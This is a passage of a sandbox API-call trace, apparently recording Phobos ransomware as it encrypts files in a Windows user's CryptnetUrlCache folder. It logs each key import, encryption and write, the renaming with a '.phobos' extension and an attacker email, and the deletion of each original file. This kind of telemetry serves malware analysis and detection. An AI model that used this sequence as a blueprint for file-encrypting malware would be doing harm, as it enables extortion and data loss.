dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0195.450] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.450] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0195.450] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.450] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0195.450] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.450] CloseHandle (hObject=0x124) returned 1 [0195.450] CloseHandle (hObject=0x12c) returned 1 [0195.450] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875")) returned 1 [0195.451] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.451] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=472) returned 1 [0195.452] CloseHandle (hObject=0x12c) returned 1 [0195.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973")) returned 0x2024 [0195.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.452] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.452] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.453] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0195.453] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.453] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d8, lpOverlapped=0x0) returned 1 [0195.454] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0195.454] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0195.454] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0195.454] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.454] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0195.454] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.454] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0195.454] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.455] CloseHandle (hObject=0x12c) returned 1 [0195.455] CloseHandle (hObject=0x124) returned 1 [0195.455] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973")) returned 1 [0195.455] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.469] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3869) returned 1 [0195.469] CloseHandle (hObject=0x12c) returned 1 [0195.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406")) returned 0x2024 [0195.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.469] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.469] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.470] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0195.470] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.470] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf1d, lpOverlapped=0x0) returned 1 [0195.566] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20, dwBufLen=0xf20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20) returned 1 [0195.566] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf20, lpOverlapped=0x0) returned 1 [0195.567] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0195.567] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.567] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0195.567] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.567] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0195.567] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.567] CloseHandle (hObject=0x12c) returned 1 [0195.567] CloseHandle (hObject=0x124) returned 1 [0195.567] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406")) returned 1 [0195.605] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0195.606] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=521) returned 1 [0195.606] CloseHandle (hObject=0x154) returned 1 [0195.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d")) returned 0x2024 [0195.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0195.606] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.606] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0195.607] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.607] ReadFile (in: hFile=0x154, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x209, lpOverlapped=0x0) returned 1 [0195.608] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x210, dwBufLen=0x210 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x210) returned 1 [0195.608] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x210, lpOverlapped=0x0) returned 1 [0195.609] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0195.609] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.609] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0195.609] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.609] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0195.609] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.609] CloseHandle (hObject=0x154) returned 1 [0195.609] CloseHandle (hObject=0x124) returned 1 [0195.609] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d")) returned 1 [0195.610] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.611] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1419) returned 1 [0195.611] CloseHandle (hObject=0x124) returned 1 [0195.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d")) returned 0x2024 [0195.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.611] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.611] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0195.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0195.612] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.612] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x58b, lpOverlapped=0x0) returned 1 [0195.614] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x590, dwBufLen=0x590 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x590) returned 1 [0195.614] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x590, lpOverlapped=0x0) returned 1 [0195.615] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0195.615] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.615] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0195.615] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.615] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0195.615] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.615] CloseHandle (hObject=0x124) returned 1 [0195.615] CloseHandle (hObject=0x154) returned 1 [0195.615] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d")) returned 1 [0195.616] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0195.617] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2920) returned 1 [0195.617] CloseHandle (hObject=0x154) returned 1 [0195.617] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1")) returned 0x2024 [0195.617] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 